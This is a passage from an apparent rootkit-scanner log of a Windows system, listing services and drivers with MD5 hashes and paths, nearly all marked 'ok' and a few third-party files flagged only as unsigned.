21:10:23.0067 4344 [ 89ED56DCE8E47AF40892778A5BD31FD2 ] FDResPub C:\Windows\system32\fdrespub.dll
21:10:23.0145 4344 FDResPub - ok
21:10:23.0176 4344 [ A8C0139A884861E3AAE9CFE73B208A9F ] FileInfo C:\Windows\system32\drivers\fileinfo.sys
21:10:23.0192 4344 FileInfo - ok
21:10:23.0207 4344 [ 0AE429A696AECBC5970E3CF2C62635AE ] Filetrace C:\Windows\system32\drivers\filetrace.sys
21:10:23.0254 4344 Filetrace - ok
21:10:23.0270 4344 [ 85B7CF99D532820495D68D747FDA9EBD ] flpydisk C:\Windows\system32\DRIVERS\flpydisk.sys
21:10:23.0317 4344 flpydisk - ok
21:10:23.0363 4344 [ 01334F9EA68E6877C4EF05D3EA8ABB05 ] FltMgr C:\Windows\system32\drivers\fltmgr.sys
21:10:23.0395 4344 FltMgr - ok
21:10:23.0504 4344 [ 8CE364388C8ECA59B14B539179276D44 ] FontCache C:\Windows\system32\FntCache.dll
21:10:23.0582 4344 FontCache - ok
21:10:23.0644 4344 [ C7FBDD1ED42F82BFA35167A5C9803EA3 ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
21:10:23.0675 4344 FontCache3.0.0.0 - ok
21:10:23.0722 4344 [ B972A66758577E0BFD1DE0F91AAA27B5 ] Fs_Rec C:\Windows\system32\drivers\Fs_Rec.sys
21:10:23.0753 4344 Fs_Rec - ok
21:10:23.0785 4344 [ 34582A6E6573D54A07ECE5FE24A126B5 ] gagp30kx C:\Windows\system32\drivers\gagp30kx.sys
21:10:23.0800 4344 gagp30kx - ok
21:10:23.0847 4344 [ 185ADA973B5020655CEE342059A86CBB ] GEARAspiWDM C:\Windows\system32\DRIVERS\GEARAspiWDM.sys
21:10:23.0847 4344 GEARAspiWDM - ok
21:10:23.0909 4344 [ CD5D0AEEE35DFD4E986A5AA1500A6E66 ] gpsvc C:\Windows\System32\gpsvc.dll
21:10:24.0003 4344 gpsvc - ok
21:10:24.0097 4344 [ 8F0DE4FEF8201E306F9938B0905AC96A ] gupdate C:\Program Files\Google\Update\GoogleUpdate.exe
21:10:24.0112 4344 gupdate - ok
21:10:24.0159 4344 [ 8F0DE4FEF8201E306F9938B0905AC96A ] gupdatem C:\Program Files\Google\Update\GoogleUpdate.exe
21:10:24.0175 4344 gupdatem - ok
21:10:24.0253 4344 [ CC839E8D766CC31A7710C9F38CF3E375 ] gusvc C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
21:10:24.0284 4344 gusvc - ok
21:10:24.0315 4344 [ CB04C744BE0A61B1D648FAED182C3B59 ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
21:10:24.0393 4344 HdAudAddService - ok
21:10:24.0455 4344 [ 062452B7FFD68C8C042A6261FE8DFF4A ] HDAudBus C:\Windows\system32\DRIVERS\HDAudBus.sys
21:10:24.0502 4344 HDAudBus - ok
21:10:24.0533 4344 [ 1338520E78D90154ED6BE8F84DE5FCEB ] HidBth C:\Windows\system32\drivers\hidbth.sys
21:10:24.0611 4344 HidBth - ok
21:10:24.0627 4344 [ FF3160C3A2445128C5A6D9B076DA519E ] HidIr C:\Windows\system32\drivers\hidir.sys
21:10:24.0705 4344 HidIr - ok
21:10:24.0736 4344 [ 84067081F3318162797385E11A8F0582 ] hidserv C:\Windows\system32\hidserv.dll
21:10:24.0767 4344 hidserv - ok
21:10:24.0799 4344 [ CCA4B519B17E23A00B826C55716809CC ] HidUsb C:\Windows\system32\DRIVERS\hidusb.sys
21:10:24.0814 4344 HidUsb - ok
21:10:24.0845 4344 [ D8AD255B37DA92434C26E4876DB7D418 ] hkmsvc C:\Windows\system32\kmsvc.dll
21:10:24.0877 4344 hkmsvc - ok
21:10:24.0892 4344 [ 16EE7B23A009E00D835CDB79574A91A6 ] HpCISSs C:\Windows\system32\drivers\hpcisss.sys
21:10:24.0908 4344 HpCISSs - ok
21:10:24.0970 4344 [ 46D67209550973257601A533E2AC5785 ] HSFHWAZL C:\Windows\system32\DRIVERS\VSTAZL3.SYS
21:10:25.0017 4344 HSFHWAZL - ok
21:10:25.0064 4344 [ 7BC42C65B5C6281777C1A7605B253BA8 ] HSF_DPV C:\Windows\system32\DRIVERS\HSX_DPV.sys
21:10:25.0173 4344 HSF_DPV - ok
21:10:25.0189 4344 [ 9EBF2D102CCBB6BCDFBF1B7922F8BA2E ] HSXHWAZL C:\Windows\system32\DRIVERS\HSXHWAZL.sys
21:10:25.0220 4344 HSXHWAZL - ok
21:10:25.0251 4344 [ F870AA3E254628EBEAFE754108D664DE ] HTTP C:\Windows\system32\drivers\HTTP.sys
21:10:25.0345 4344 HTTP - ok
21:10:25.0391 4344 [ C6B032D69650985468160FC9937CF5B4 ] i2omp C:\Windows\system32\drivers\i2omp.sys
21:10:25.0407 4344 i2omp - ok
21:10:25.0469 4344 [ 22D56C8184586B7A1F6FA60BE5F5A2BD ] i8042prt C:\Windows\system32\DRIVERS\i8042prt.sys
21:10:25.0516 4344 i8042prt - ok
21:10:25.0532 4344 [ 54155EA1B0DF185878E0FC9EC3AC3A14 ] iaStorV C:\Windows\system32\drivers\iastorv.sys
21:10:25.0563 4344 iaStorV - ok
21:10:25.0641 4344 [ 98477B08E61945F974ED9FDC4CB6BDAB ] idsvc C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
21:10:25.0719 4344 idsvc - ok
21:10:25.0750 4344 [ 2D077BF86E843F901D8DB709C95B49A5 ] iirsp C:\Windows\system32\drivers\iirsp.sys
21:10:25.0766 4344 iirsp - ok
21:10:25.0828 4344 [ 9908D8A397B76CD8D31D0D383C5773C9 ] IKEEXT C:\Windows\System32\ikeext.dll
21:10:25.0891 4344 IKEEXT - ok
21:10:25.0922 4344 [ C6E5276C00EBDEB096BB5EF4B797D1B6 ] int15 C:\Acer\Empowering Technology\eRecovery\int15.sys
21:10:25.0937 4344 int15 - ok
21:10:26.0062 4344 [ B795745F7E51AA20D46753EC5A811ACA ] IntcAzAudAddService C:\Windows\system32\drivers\RTKVHDA.sys
21:10:26.0234 4344 IntcAzAudAddService - ok
21:10:26.0265 4344 [ 83AA759F3189E6370C30DE5DC5590718 ] intelide C:\Windows\system32\drivers\intelide.sys
21:10:26.0281 4344 intelide - ok
21:10:26.0327 4344 [ 224191001E78C89DFA78924C3EA595FF ] intelppm C:\Windows\system32\DRIVERS\intelppm.sys
21:10:26.0374 4344 intelppm - ok
21:10:26.0437 4344 [ 9AC218C6E6105477484C6FDBE7D409A4 ] IPBusEnum C:\Windows\system32\ipbusenum.dll
21:10:26.0483 4344 IPBusEnum - ok
21:10:26.0515 4344 [ 62C265C38769B864CB25B4BCF62DF6C3 ] IpFilterDriver C:\Windows\system32\DRIVERS\ipfltdrv.sys
21:10:26.0561 4344 IpFilterDriver - ok
21:10:26.0608 4344 [ 1998BD97F950680BB55F55A7244679C2 ] iphlpsvc C:\Windows\System32\iphlpsvc.dll
21:10:26.0655 4344 iphlpsvc - ok
21:10:26.0655 4344 IpInIp - ok
21:10:26.0686 4344 [ B25AAF203552B7B3491139D582B39AD1 ] IPMIDRV C:\Windows\system32\drivers\ipmidrv.sys
21:10:26.0733 4344 IPMIDRV - ok
21:10:26.0749 4344 [ 8793643A67B42CEC66490B2A0CF92D68 ] IPNAT C:\Windows\system32\DRIVERS\ipnat.sys
21:10:26.0780 4344 IPNAT - ok
21:10:26.0889 4344 [ E8A39D41474BE42FD8830CED32932D6C ] iPod Service C:\Program Files\iPod\bin\iPodService.exe
21:10:26.0920 4344 iPod Service - ok
21:10:26.0967 4344 [ E50A95179211B12946F7E035D60AF560 ] irda C:\Windows\system32\DRIVERS\irda.sys
21:10:27.0045 4344 irda - ok
21:10:27.0076 4344 [ 109C0DFB82C3632FBD11949B73AEEAC9 ] IRENUM C:\Windows\system32\drivers\irenum.sys
21:10:27.0123 4344 IRENUM - ok
21:10:27.0139 4344 [ CBB0D940221A281BCFEAEA695BD1CDA5 ] Irmon C:\Windows\System32\irmon.dll
21:10:27.0217 4344 Irmon - ok
21:10:27.0232 4344 [ 6C70698A3E5C4376C6AB5C7C17FB0614 ] isapnp C:\Windows\system32\drivers\isapnp.sys
21:10:27.0263 4344 isapnp - ok
21:10:27.0310 4344 [ 232FA340531D940AAC623B121A595034 ] iScsiPrt C:\Windows\system32\DRIVERS\msiscsi.sys
21:10:27.0341 4344 iScsiPrt - ok
21:10:27.0357 4344 [ BCED60D16156E428F8DF8CF27B0DF150 ] iteatapi C:\Windows\system32\drivers\iteatapi.sys
21:10:27.0373 4344 iteatapi - ok
21:10:27.0388 4344 [ 06FA654504A498C30ADCA8BEC4E87E7E ] iteraid C:\Windows\system32\drivers\iteraid.sys
21:10:27.0404 4344 iteraid - ok
21:10:27.0435 4344 [ 37605E0A8CF00CBBA538E753E4344C6E ] kbdclass C:\Windows\system32\DRIVERS\kbdclass.sys
21:10:27.0451 4344 kbdclass - ok
21:10:27.0482 4344 [ EDE59EC70E25C24581ADD1FBEC7325F7 ] kbdhid C:\Windows\system32\DRIVERS\kbdhid.sys
21:10:27.0529 4344 kbdhid - ok
21:10:27.0560 4344 [ A3E186B4B935905B829219502557314E ] KeyIso C:\Windows\system32\lsass.exe
21:10:27.0591 4344 KeyIso - ok
21:10:27.0638 4344 [ 4A1445EFA932A3BAF5BDB02D7131EE20 ] KSecDD C:\Windows\system32\Drivers\ksecdd.sys
21:10:27.0669 4344 KSecDD - ok
21:10:27.0747 4344 [ 8078F8F8F7A79E2E6B494523A828C585 ] KtmRm C:\Windows\system32\msdtckrm.dll
21:10:27.0825 4344 KtmRm - ok
21:10:27.0903 4344 [ 1BF5EEBFD518DD7298434D8C862F825D ] LanmanServer C:\Windows\system32\srvsvc.dll
21:10:27.0950 4344 LanmanServer - ok
21:10:27.0997 4344 [ 1DB69705B695B987082C8BAEC0C6B34F ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
21:10:28.0075 4344 LanmanWorkstation - ok
21:10:28.0137 4344 [ 793FF718477345CD5D232C50BED1E452 ] LightScribeService C:\Program Files\Common Files\LightScribe\LSSrvc.exe
21:10:28.0168 4344 LightScribeService ( UnsignedFile.Multi.Generic ) - warning
21:10:28.0168 4344 LightScribeService - detected UnsignedFile.Multi.Generic (1)
21:10:28.0215 4344 [ D1C5883087A0C3F1344D9D55A44901F6 ] lltdio C:\Windows\system32\DRIVERS\lltdio.sys
21:10:28.0309 4344 lltdio - ok
21:10:28.0355 4344 [ 2D5A428872F1442631D0959A34ABFF63 ] lltdsvc C:\Windows\System32\lltdsvc.dll
21:10:28.0418 4344 lltdsvc - ok
21:10:28.0449 4344 [ 35D40113E4A5B961B6CE5C5857702518 ] lmhosts C:\Windows\System32\lmhsvc.dll
21:10:28.0496 4344 lmhosts - ok
21:10:28.0527 4344 [ C7E15E82879BF3235B559563D4185365 ] LSI_FC C:\Windows\system32\drivers\lsi_fc.sys
21:10:28.0558 4344 LSI_FC - ok
21:10:28.0574 4344 [ EE01EBAE8C9BF0FA072E0FF68718920A ] LSI_SAS C:\Windows\system32\drivers\lsi_sas.sys
21:10:28.0605 4344 LSI_SAS - ok
21:10:28.0636 4344 [ 912A04696E9CA30146A62AFA1463DD5C ] LSI_SCSI C:\Windows\system32\drivers\lsi_scsi.sys
21:10:28.0652 4344 LSI_SCSI - ok
21:10:28.0667 4344 [ 8F5C7426567798E62A3B3614965D62CC ] luafv C:\Windows\system32\drivers\luafv.sys
21:10:28.0714 4344 luafv - ok
21:10:28.0761 4344 [ 69A6268D7F81E53D568AB4E7E991CAF3 ] MBAMProtector C:\Windows\system32\drivers\mbam.sys
21:10:28.0792 4344 MBAMProtector - ok
21:10:28.0870 4344 [ 94E920BE59B9AB65D95E582DBAA136AC ] MBAMService C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
21:10:28.0917 4344 MBAMService - ok
21:10:28.0979 4344 [ AEF9BABB8A506BC4CE0451A64AADED46 ] Mcx2Svc C:\Windows\system32\Mcx2Svc.dll
21:10:29.0011 4344 Mcx2Svc - ok
21:10:29.0057 4344 [ 0CEA2D0D3FA284B85ED5B68365114F76 ] mdmxsdk C:\Windows\system32\DRIVERS\mdmxsdk.sys
21:10:29.0073 4344 mdmxsdk - ok
21:10:29.0089 4344 [ 0001CE609D66632FA17B84705F658879 ] megasas C:\Windows\system32\drivers\megasas.sys
21:10:29.0104 4344 megasas - ok
21:10:29.0167 4344 [ C252F32CD9A49DBFC25ECF26EBD51A99 ] MegaSR C:\Windows\system32\drivers\megasr.sys
21:10:29.0198 4344 MegaSR - ok
21:10:29.0260 4344 [ 1076FFCFFAAE8385FD62DFCB25AC4708 ] MMCSS C:\Windows\system32\mmcss.dll
21:10:29.0307 4344 MMCSS - ok
21:10:29.0323 4344 MobilityService - ok
21:10:29.0354 4344 [ E13B5EA0F51BA5B1512EC671393D09BA ] Modem C:\Windows\system32\drivers\modem.sys
21:10:29.0385 4344 Modem - ok
21:10:29.0432 4344 [ 0A9BB33B56E294F686ABB7C1E4E2D8A8 ] monitor C:\Windows\system32\DRIVERS\monitor.sys
21:10:29.0479 4344 monitor - ok
21:10:29.0494 4344 [ 5BF6A1326A335C5298477754A506D263 ] mouclass C:\Windows\system32\DRIVERS\mouclass.sys
21:10:29.0510 4344 mouclass - ok
21:10:29.0525 4344 [ 93B8D4869E12CFBE663915502900876F ] mouhid C:\Windows\system32\DRIVERS\mouhid.sys
21:10:29.0572 4344 mouhid - ok
21:10:29.0603 4344 [ BDAFC88AA6B92F7842416EA6A48E1600 ] MountMgr C:\Windows\system32\drivers\mountmgr.sys
21:10:29.0619 4344 MountMgr - ok
21:10:29.0635 4344 [ 511D011289755DD9F9A7579FB0B064E6 ] mpio C:\Windows\system32\drivers\mpio.sys
21:10:29.0650 4344 mpio - ok
21:10:29.0666 4344 [ 22241FEBA9B2DEFA669C8CB0A8DD7D2E ] mpsdrv C:\Windows\system32\drivers\mpsdrv.sys
21:10:29.0713 4344 mpsdrv - ok
21:10:29.0759 4344 [ 5DE62C6E9108F14F6794060A9BDECAEC ] MpsSvc C:\Windows\system32\mpssvc.dll
21:10:29.0822 4344 MpsSvc - ok
21:10:29.0853 4344 [ 4FBBB70D30FD20EC51F80061703B001E ] Mraid35x C:\Windows\system32\drivers\mraid35x.sys
21:10:29.0869 4344 Mraid35x - ok
21:10:29.0915 4344 [ 82CEA0395524AACFEB58BA1448E8325C ] MRxDAV C:\Windows\system32\drivers\mrxdav.sys
21:10:29.0947 4344 MRxDAV - ok
21:10:29.0993 4344 [ 1E94971C4B446AB2290DEB71D01CF0C2 ] mrxsmb C:\Windows\system32\DRIVERS\mrxsmb.sys
21:10:30.0025 4344 mrxsmb - ok
21:10:30.0056 4344 [ 4FCCB34D793B116423209C0F8B7A3B03 ] mrxsmb10 C:\Windows\system32\DRIVERS\mrxsmb10.sys
21:10:30.0087 4344 mrxsmb10 - ok
21:10:30.0118 4344 [ C3CB1B40AD4A0124D617A1199B0B9D7C ] mrxsmb20 C:\Windows\system32\DRIVERS\mrxsmb20.sys
21:10:30.0149 4344 mrxsmb20 - ok
21:10:30.0196 4344 [ 28023E86F17001F7CD9B15A5BC9AE07D ] msahci C:\Windows\system32\drivers\msahci.sys
21:10:30.0212 4344 msahci - ok
21:10:30.0227 4344 [ 4468B0F385A86ECDDAF8D3CA662EC0E7 ] msdsm C:\Windows\system32\drivers\msdsm.sys
21:10:30.0259 4344 msdsm - ok
21:10:30.0290 4344 [ FD7520CC3A80C5FC8C48852BB24C6DED ] MSDTC C:\Windows\System32\msdtc.exe
21:10:30.0352 4344 MSDTC - ok
21:10:30.0399 4344 [ A9927F4A46B816C92F461ACB90CF8515 ] Msfs C:\Windows\system32\drivers\Msfs.sys
21:10:30.0446 4344 Msfs - ok
21:10:30.0477 4344 [ 0F400E306F385C56317357D6DEA56F62 ] msisadrv C:\Windows\system32\drivers\msisadrv.sys
21:10:30.0493 4344 msisadrv - ok
21:10:30.0524 4344 [ 85466C0757A23D9A9AECDC0755203CB2 ] MSiSCSI C:\Windows\system32\iscsiexe.dll
21:10:30.0586 4344 MSiSCSI - ok
21:10:30.0602 4344 msiserver - ok
21:10:30.0617 4344 [ D8C63D34D9C9E56C059E24EC7185CC07 ] MSKSSRV C:\Windows\system32\drivers\MSKSSRV.sys
21:10:30.0649 4344 MSKSSRV - ok
21:10:30.0680 4344 [ 1D373C90D62DDB641D50E55B9E78D65E ] MSPCLOCK C:\Windows\system32\drivers\MSPCLOCK.sys
21:10:30.0711 4344 MSPCLOCK - ok
21:10:30.0742 4344 [ B572DA05BF4E098D4BBA3A4734FB505B ] MSPQM C:\Windows\system32\drivers\MSPQM.sys
21:10:30.0789 4344 MSPQM - ok
21:10:30.0836 4344 [ B49456D70555DE905C311BCDA6EC6ADB ] MsRPC C:\Windows\system32\drivers\MsRPC.sys
21:10:30.0851 4344 MsRPC - ok
21:10:30.0883 4344 [ E384487CB84BE41D09711C30CA79646C ] mssmbios C:\Windows\system32\DRIVERS\mssmbios.sys
21:10:30.0898 4344 mssmbios - ok
21:10:30.0945 4344 [ 7199C1EEC1E4993CAF96B8C0A26BD58A ] MSTEE C:\Windows\system32\drivers\MSTEE.sys
21:10:30.0976 4344 MSTEE - ok
21:10:31.0023 4344 [ 6A57B5733D4CB702C8EA4542E836B96C ] Mup C:\Windows\system32\Drivers\mup.sys
21:10:31.0039 4344 Mup - ok
21:10:31.0085 4344 [ E4EAF0C5C1B41B5C83386CF212CA9584 ] napagent C:\Windows\system32\qagentRT.dll
21:10:31.0132 4344 napagent - ok
21:10:31.0163 4344 [ 85C44FDFF9CF7E72A40DCB7EC06A4416 ] NativeWifiP C:\Windows\system32\DRIVERS\nwifi.sys
21:10:31.0195 4344 NativeWifiP - ok
21:10:31.0241 4344 [ 73341048AECAB1099BB6D8054CF847DA ] ndfs C:\Program Files\NetDrive\ndfs.sys
21:10:31.0257 4344 ndfs - ok
21:10:31.0319 4344 [ 1357274D1883F68300AEADD15D7BBB42 ] NDIS C:\Windows\system32\drivers\ndis.sys
21:10:31.0351 4344 NDIS - ok
21:10:31.0397 4344 [ 0E186E90404980569FB449BA7519AE61 ] NdisTapi C:\Windows\system32\DRIVERS\ndistapi.sys
21:10:31.0429 4344 NdisTapi - ok
21:10:31.0460 4344 [ D6973AA34C4D5D76C0430B181C3CD389 ] Ndisuio C:\Windows\system32\DRIVERS\ndisuio.sys
21:10:31.0522 4344 Ndisuio - ok
21:10:31.0585 4344 [ 818F648618AE34F729FDB47EC68345C3 ] NdisWan C:\Windows\system32\DRIVERS\ndiswan.sys
21:10:31.0631 4344 NdisWan - ok
21:10:31.0647 4344 [ 71DAB552B41936358F3B541AE5997FB3 ] NDProxy C:\Windows\system32\drivers\NDProxy.sys
21:10:31.0678 4344 NDProxy - ok
21:10:31.0756 4344 [ 651A5EF0C54737043898868B5F39A406 ] ndsvc C:\Program Files\NetDrive\ndsvc.exe
21:10:31.0881 4344 ndsvc ( UnsignedFile.Multi.Generic ) - warning
21:10:31.0881 4344 ndsvc - detected UnsignedFile.Multi.Generic (1)
21:10:31.0897 4344 [ BCD093A5A6777CF626434568DC7DBA78 ] NetBIOS C:\Windows\system32\DRIVERS\netbios.sys
21:10:31.0928 4344 NetBIOS - ok
21:10:31.0990 4344 [ ECD64230A59CBD93C85F1CD1CAB9F3F6 ] netbt C:\Windows\system32\DRIVERS\netbt.sys
21:10:32.0021 4344 netbt - ok
21:10:32.0037 4344 [ A3E186B4B935905B829219502557314E ] Netlogon C:\Windows\system32\lsass.exe
21:10:32.0053 4344 Netlogon - ok
21:10:32.0084 4344 [ C8052711DAECC48B982434C5116CA401 ] Netman C:\Windows\System32\netman.dll
21:10:32.0131 4344 Netman - ok
21:10:32.0162 4344 [ 2EF3BBE22E5A5ACD1428EE387A0D0172 ] netprofm C:\Windows\System32\netprofm.dll
21:10:32.0209 4344 netprofm - ok
21:10:32.0240 4344 [ D6C4E4A39A36029AC0813D476FBD0248 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
21:10:32.0271 4344 NetTcpPortSharing - ok
21:10:32.0302 4344 [ 2E7FB731D4790A1BC6270ACCEFACB36E ] nfrd960 C:\Windows\system32\drivers\nfrd960.sys
21:10:32.0318 4344 nfrd960 - ok
21:10:32.0333 4344 [ 2997B15415F9BBE05B5A4C1C85E0C6A2 ] NlaSvc C:\Windows\System32\nlasvc.dll
21:10:32.0365 4344 NlaSvc - ok
21:10:32.0489 4344 [ 74149BCF0307BB76D68C0F8912DF731C ] NMIndexingService C:\Program Files\Common Files\Nero\Lib\NMIndexingService.exe
21:10:32.0521 4344 NMIndexingService - ok
21:10:32.0567 4344 [ D36F239D7CCE1931598E8FB90A0DBC26 ] Npfs C:\Windows\system32\drivers\Npfs.sys
21:10:32.0614 4344 Npfs - ok
21:10:32.0630 4344 [ 6D8D2E5652FC2442C810C5D8BE784148 ] NSCIRDA C:\Windows\system32\DRIVERS\nscirda.sys
21:10:32.0661 4344 NSCIRDA - ok
21:10:32.0692 4344 [ 8BB86F0C7EEA2BDED6FE095D0B4CA9BD ] nsi C:\Windows\system32\nsisvc.dll
21:10:32.0723 4344 nsi - ok
21:10:32.0739 4344 [ 609773E344A97410CE4EBF74A8914FCF ] nsiproxy C:\Windows\system32\drivers\nsiproxy.sys
21:10:32.0786 4344 nsiproxy - ok
21:10:32.0864 4344 [ 2C1121F2B87E9A6B12485DF53CD848C7 ] Ntfs C:\Windows\system32\drivers\Ntfs.sys
21:10:32.0942 4344 Ntfs - ok
21:10:32.0973 4344 [ 7F1C1F78D709C4A54CBB46EDE7E0B48D ] NTIDrvr C:\Windows\system32\DRIVERS\NTIDrvr.sys
21:10:32.0989 4344 NTIDrvr ( UnsignedFile.Multi.Generic ) - warning
21:10:32.0989 4344 NTIDrvr - detected UnsignedFile.Multi.Generic (1)
21:10:33.0020 4344 [ E875C093AEC0C978A90F30C9E0DFBB72 ] ntrigdigi C:\Windows\system32\drivers\ntrigdigi.sys
21:10:33.0082 4344 ntrigdigi - ok
21:10:33.0082 4344 [ C5DBBCDA07D780BDA9B685DF333BB41E ] Null C:\Windows\system32\drivers\Null.sys
21:10:33.0113 4344 Null - ok
21:10:33.0145 4344 [ 2EDF9E7751554B42CBB60116DE727101 ] nvraid C:\Windows\system32\drivers\nvraid.sys
21:10:33.0160 4344 nvraid - ok
21:10:33.0176 4344 [ ABED0C09758D1D97DB0042DBB2688177 ] nvstor C:\Windows\system32\drivers\nvstor.sys
21:10:33.0207 4344 nvstor - ok
21:10:33.0223 4344 [ 18BBDF913916B71BD54575BDB6EEAC0B ] nv_agp C:\Windows\system32\drivers\nv_agp.sys
21:10:33.0238 4344 nv_agp - ok
21:10:33.0254 4344 NwlnkFlt - ok
21:10:33.0254 4344 NwlnkFwd - ok
21:10:33.0285 4344 [ 36ED541FF0AD27D7F1C1E8F86F026309 ] O2MDRDR C:\Windows\system32\DRIVERS\o2media.sys
21:10:33.0332 4344 O2MDRDR - ok
21:10:33.0394 4344 [ F3D467025D365A96B5E51C6229562716 ] O2SDRDR C:\Windows\system32\DRIVERS\o2sd.sys
21:10:33.0441 4344 O2SDRDR - ok
21:10:33.0550 4344 [ 785F487A64950F3CB8E9F16253BA3B7B ] odserv C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE
21:10:33.0581 4344 odserv - ok
21:10:33.0644 4344 [ 6F310E890D46E246E0E261A63D9B36B4 ] ohci1394 C:\Windows\system32\DRIVERS\ohci1394.sys
21:10:33.0675 4344 ohci1394 - ok
21:10:33.0753 4344 [ 9D10F99A6712E28F8ACD5641E3A7EA6B ] ose C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
21:10:33.0769 4344 ose - ok
21:10:34.0127 4344 [ 358A9CCA612C68EB2F07DDAD4CE1D8D7 ] osppsvc C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
21:10:34.0502 4344 osppsvc - ok
21:10:34.0564 4344 [ 0C8E8E61AD1EB0B250B846712C917506 ] p2pimsvc C:\Windows\system32\p2psvc.dll
21:10:34.0689 4344 p2pimsvc - ok
21:10:34.0705 4344 [ 0C8E8E61AD1EB0B250B846712C917506 ] p2psvc C:\Windows\system32\p2psvc.dll
21:10:34.0736 4344 p2psvc - ok
21:10:34.0767 4344 [ 0FA9B5055484649D63C303FE404E5F4D ] Parport C:\Windows\system32\drivers\parport.sys
21:10:34.0829 4344 Parport - ok
21:10:34.0861 4344 [ B9C2B89F08670E159F7181891E449CD9 ] partmgr C:\Windows\system32\drivers\partmgr.sys
21:10:34.0876 4344 partmgr - ok
21:10:34.0892 4344 [ 4F9A6A8A31413180D0FCB279AD5D8112 ] Parvdm C:\Windows\system32\drivers\parvdm.sys
21:10:34.0954 4344 Parvdm - ok
21:10:34.0985 4344 [ C6276AD11F4BB49B58AA1ED88537F14A ] PcaSvc C:\Windows\System32\pcasvc.dll
21:10:35.0032 4344 PcaSvc - ok
21:10:35.0079 4344 [ 941DC1D19E7E8620F40BBC206981EFDB ] pci C:\Windows\system32\drivers\pci.sys
21:10:35.0095 4344 pci - ok
21:10:35.0141 4344 [ 1636D43F10416AEB483BC6001097B26C ] pciide C:\Windows\system32\drivers\pciide.sys
21:10:35.0157 4344 pciide - ok
21:10:35.0188 4344 [ 3BB2244F343B610C29C98035504C9B75 ] pcmcia C:\Windows\system32\DRIVERS\pcmcia.sys
21:10:35.0204 4344 pcmcia - ok
21:10:35.0251 4344 [ 6349F6ED9C623B44B52EA3C63C831A92 ] PEAUTH C:\Windows\system32\drivers\peauth.sys
21:10:35.0375 4344 PEAUTH - ok
21:10:35.0453 4344 [ B1689DF169143F57053F795390C99DB3 ] pla C:\Windows\system32\pla.dll
21:10:35.0625 4344 pla - ok
21:10:35.0672 4344 [ C5E7F8A996EC0A82D508FD9064A5569E ] PlugPlay C:\Windows\system32\umpnpmgr.dll
21:10:35.0719 4344 PlugPlay - ok
21:10:35.0797 4344 [ 0C8E8E61AD1EB0B250B846712C917506 ] PNRPAutoReg C:\Windows\system32\p2psvc.dll
21:10:35.0843 4344 PNRPAutoReg - ok
21:10:35.0906 4344 [ 0C8E8E61AD1EB0B250B846712C917506 ] PNRPsvc C:\Windows\system32\p2psvc.dll
21:10:35.0953 4344 PNRPsvc - ok
21:10:36.0015 4344 [ D0494460421A03CD5225CCA0059AA146 ] PolicyAgent C:\Windows\System32\ipsecsvc.dll
21:10:36.0093 4344 PolicyAgent - ok
21:10:36.0124 4344 [ ECFFFAEC0C1ECD8DBC77F39070EA1DB1 ] PptpMiniport C:\Windows\system32\DRIVERS\raspptp.sys
21:10:36.0171 4344 PptpMiniport - ok
21:10:36.0187 4344 [ 2027293619DD0F047C584CF2E7DF4FFD ] Processor C:\Windows\system32\drivers\processr.sys
21:10:36.0218 4344 Processor - ok
21:10:36.0265 4344 [ 0508FAA222D28835310B7BFCA7A77346 ] ProfSvc C:\Windows\system32\profsvc.dll
21:10:36.0296 4344 ProfSvc - ok
21:10:36.0327 4344 [ A3E186B4B935905B829219502557314E ] ProtectedStorage C:\Windows\system32\lsass.exe
21:10:36.0343 4344 ProtectedStorage - ok
21:10:36.0389 4344 [ 99514FAA8DF93D34B5589187DB3AA0BA ] PSched C:\Windows\system32\DRIVERS\pacer.sys
21:10:36.0421 4344 PSched - ok
21:10:36.0452 4344 [ 18DE162F9B83079C24CD96F59292F5ED ] PSDFilter C:\Windows\system32\DRIVERS\psdfilter.sys
21:10:36.0467 4344 PSDFilter - ok
21:10:36.0483 4344 [ BC1457A28E76AB3106D43802AC22A627 ] PSDNServ C:\Windows\system32\DRIVERS\PSDNServ.sys
21:10:36.0499 4344 PSDNServ - ok
21:10:36.0514 4344 [ AC151E5B0943304E368C98EC78B5FC4F ] psdvdisk C:\Windows\system32\DRIVERS\PSDVdisk.sys
21:10:36.0530 4344 psdvdisk - ok
21:10:36.0623 4344 [ 0A6DB55AFB7820C99AA1F3A1D270F4F6 ] ql2300 C:\Windows\system32\drivers\ql2300.sys
21:10:36.0733 4344 ql2300 - ok
21:10:36.0795 4344 [ 81A7E5C076E59995D54BC1ED3A16E60B ] ql40xx C:\Windows\system32\drivers\ql40xx.sys
21:10:36.0811 4344 ql40xx - ok
21:10:36.0873 4344 [ E9ECAE663F47E6CB43962D18AB18890F ] QWAVE C:\Windows\system32\qwave.dll
21:10:36.0904 4344 QWAVE - ok
21:10:36.0920 4344 [ 9F5E0E1926014D17486901C88ECA2DB7 ] QWAVEdrv C:\Windows\system32\drivers\qwavedrv.sys
21:10:36.0951 4344 QWAVEdrv - ok
21:10:36.0967 4344 [ 147D7F9C556D259924351FEB0DE606C3 ] RasAcd C:\Windows\system32\DRIVERS\rasacd.sys
21:10:36.0998 4344 RasAcd - ok
21:10:37.0013 4344 [ F6A452EB4CEADBB51C9E0EE6B3ECEF0F ] RasAuto C:\Windows\System32\rasauto.dll
21:10:37.0076 4344 RasAuto - ok
21:10:37.0091 4344 [ A214ADBAF4CB47DD2728859EF31F26B0 ] Rasl2tp C:\Windows\system32\DRIVERS\rasl2tp.sys
21:10:37.0138 4344 Rasl2tp - ok
21:10:37.0185 4344 [ 75D47445D70CA6F9F894B032FBC64FCF ] RasMan C:\Windows\System32\rasmans.dll
21:10:37.0232 4344 RasMan - ok
21:10:37.0263 4344 [ 509A98DD18AF4375E1FC40BC175F1DEF ] RasPppoe C:\Windows\system32\DRIVERS\raspppoe.sys
21:10:37.0294 4344 RasPppoe - ok
